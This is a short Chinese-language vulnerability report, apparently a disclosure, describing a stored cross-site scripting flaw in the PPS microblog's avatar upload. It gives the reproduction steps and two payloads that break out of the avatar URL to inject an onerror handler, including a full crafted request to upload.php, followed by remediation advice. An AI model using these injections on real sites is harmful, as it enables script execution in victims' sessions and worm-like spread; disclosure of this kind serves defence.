简要描述：存储型XSS，及其容易造成蠕虫和感染。

详细说明：<漏洞存在的产品对象>

PPS微博

<危害>

存储型XSS漏洞，可以造成蠕虫传播，危害严重

<重现方法>

演示地址：

http://y.pps.tv/154193789

实现方法： www.2cto.com

用户设置->修改头像->选择头像->抓包修改头像地址为：http://s3.ppsimg.com/t_images/face_temp/20111109/pnge6211f49803f9efd2c8f937f6587a609.j"+src=#+onerror="alert(1)

 

或者直接提交数据：

http://y.pps.tv/upload.php?type=face&r=0.5138148728288972&p=http%3a%2f%2fs3.ppsimg.com%2ft_images%2fface_temp%2f20111109%2fpnge6211f49803f9efd2c8f937f6587a609.j%22+src=%23+onerror%3d%22alert(1)&x=0&y=0&w=32&h=31&o_page=setting_myface

<修复建议>

1.加强过滤

2.把头像提交数据的方式修改为POST,防止短连接诱惑用户修改头像。

漏洞证明：

 

 

 

 

修复方案：见详细说明

作者 ccSec